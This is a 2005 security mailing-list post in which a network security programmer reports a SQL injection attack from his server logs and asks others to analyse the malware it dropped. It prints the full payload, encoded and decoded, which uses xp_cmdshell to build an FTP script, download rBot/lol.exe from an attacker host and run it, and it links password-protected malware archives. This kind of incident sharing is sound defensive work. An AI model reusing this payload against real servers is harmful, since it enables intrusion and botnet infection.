Hi to the List today we received the same SQL injection attack on the same URL :
IP : 24.1.139.29 (c-24-1-139-29.client.comcast.net) User Agent : none sent HTTP Verb : GET /theasppage.asp?anID= Attack : 377';exec MASTER..xp_cmdshell 'mkdir %systemroot%\system32\Macromed\lolx\'; exec MASTER..xp_cmdshell 'echo open z.z.z.z 21 >> %systemroot%\system32\Macromed\lolx\blah.jkd'; exec MASTER..xp_cmdshell 'echo USER chadicka r0ckpaul >> %systemroot%\system32\macromed\lolx\blah.jkd'; exec MASTER..xp_cmdshell 'echo binary >> %systemroot%\system32\macromed\lolx\blah.jkd'; exec MASTER..xp_cmdshell 'echo get lol.exe %systemroot%\system32\Macromed\lolx\arcdlrde.exe >> %systemroot%\system32\Macromed\lolx\blah.jkd'; exec MASTER..xp_cmdshell 'echo quit >> %systemroot%\system32\Macromed\lolx\blah.jkd'; exec MASTER..xp_cmdshell 'ftp.exe -i -n -v -s:%systemroot%\system32\Macromed\lolx\blah.jkd'; exec MASTER..xp_cmdshell 'del %systemroot%\system32\Macromed\lolx\blah.jkd'; exec MASTER..xp_cmdshell '%systemroot%\system32\Macromed\lolx\arcdlrde.exe'-- The lol.exe file can be found in this archive for inspection : http://www.cybergeneration.com/security/2005.01.19/lol.zip zip pass is das978tewa234 Norton with definitions of 12 jan. doesnt find anything suspicious. I'm interested if someone do an analysis on this file. Have a nice day Maxime Ducharme Programmeur / Sp�cialiste en s�curit� r�seau ----- Original Message ----- From: "Maxime Ducharme" <[EMAIL PROTECTED]> To: <[email protected]>; "General DShield Discussion List" <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]> Sent: Wednesday, January 05, 2005 12:22 PM Subject: [Dshield] SQL injection worm ? > > Hi list, > we receveid a particular SQL injection attack > on one of our site. > > Attack looks like : > 2005-01-05 14:39:20 24.164.202.24 - W3SVCX SRVNAME x.x.x.x 80 GET > /Nouvelles.asp > id_nouvelle=377';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73%68 > %65%6C%6C%20'mkdir%20%25systemroot%25%5Csystem32%5CMacromed%5Clolx%5C';%65%7 > 8%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73%68%65%6C%6C%20'echo%20op > en%20y.y.y.y%2021%20%3E%3E%20%25systemroot%25%5Csystem32%5CMacromed% > 5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73% > 68%65%6C%6C%20'echo%20USER%20hahajk%20hahaowned%20%3E%3E%20%25systemroot%25% > 5Csystem32%5Cmacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52.. > %78%70%5F%63%6D%64%73%68%65%6C%6C%20'echo%20get%20rBot.exe%20%25systemroot%2 > 5%5Csystem32%5CMacromed%5Clolx%5Carcdlrde.exe%20%3E%3E%20%25systemroot%25%5C > system32%5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%7 > 8%70%5F%63%6D%64%73%68%65%6C%6C%20'echo%20quit%20%3E%3E%20%25systemroot%25%5 > Csystem32%5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..% > 78%70%5F%63%6D%64%73%68%65%6C%6C%20'ftp.exe%20-i%20-n%20-v%20-s:%25systemroo > t%25%5Csystem32%5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45 > %52..%78%70%5F%63%6D%64%73%68%65%6C%6C%20'del%20%25systemroot%25%5Csystem32% > 5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%6 > 3%6D%64%73%68%65%6C%6C%20'%25systemroot%25%5Csystem32%5CMacromed%5Clolx%5Car > cdlrde.exe'--|17|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Lin > e_1:_Incorrect_syntax_near_''. 500 0 0 1395 570 HTTP/1.1 > attacked.web.site.com - - - > > HTTP request contains only 2 fields (beside HTTP method) : > Connection: Keep-Alive > Host: attacked.web.site.com > > (I obviously replaced the name of the site). > > Decoded SQL injection looks like : > exec MASTER..xp_cmdshell 'mkdir %systemroot%\system32\Macromed\lolx\'; > exec MASTER..xp_cmdshell 'echo open y.y.y.y 21 >> > %systemroot%\system32\Macromed\lolx\blah.jkd'; > exec MASTER..xp_cmdshell 'echo USER hahajk hahaowned >> > %systemroot%\system32\macromed\lolx\blah.jkd'; > exec MASTER..xp_cmdshell 'echo get rBot.exe > %systemroot%\system32\Macromed\lolx\arcdlrde.exe >> > %systemroot%\system32\Macromed\lolx\blah.jkd'; > exec MASTER..xp_cmdshell 'echo quit >> > %systemroot%\system32\Macromed\lolx\blah.jkd'; > exec MASTER..xp_cmdshell > 'ftp.exe -i -n -v -s:%systemroot%\system32\Macromed\lolx\blah.jkd'; > exec MASTER..xp_cmdshell 'del %systemroot%\system32\Macromed\lolx\blah.jkd'; > exec MASTER..xp_cmdshell '%systemroot%\system32\Macromed\lolx\arcdlrde.exe > > y.y.y.y is a foreign IP in Europe which host FTP an WWW server. > I sent a notice this this site sysadmin about the situation. > > I have been able to connect to this FTP with the account hahajk/hahaowned > (which do not seem legit to me ...) and download suspicious files. > I mirrored them here : > http://www.cybergeneration.com/security/2005.01.05/rbot.exe_ftp.zip > zip pass is 968goyw439807r3qw > > 24.164.202.24 is on rr.com networks, they have also been advised. > > I know rbot.exe is known to be Randex worm, but i'd like that have > some other results / analysis. > > I also found a "test.asp" file which contains the Spybot worm. > > Weird thing is, I searched for this hosts's activity on every server > and every firewall we run, and I only see 1 TCP connection which > is the prepared SQL injections attack, nothing else. > > Anybody see similar activity ? > > I'm asking since I want to know if we are targeted by someone of > by a worm like Santy of use search engines to find vulnerable > ASP scripts. > > Thanks in advance > > Happy new year to everyone ! > > Maxime Ducharme > Programmeur / Sp�cialiste en s�curit� r�seau > > > > -------------- Sponsor Message ------------------------------------ > SANS Intrusion Immersion Training: Orlando, FL, February 3-9th > http://www.sans.org/orlando05 > > _______________________________________________ > send all posts to [EMAIL PROTECTED] > To change your subscription options (or unsubscribe), see: http://www.dshield.org/mailman/listinfo/list > _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
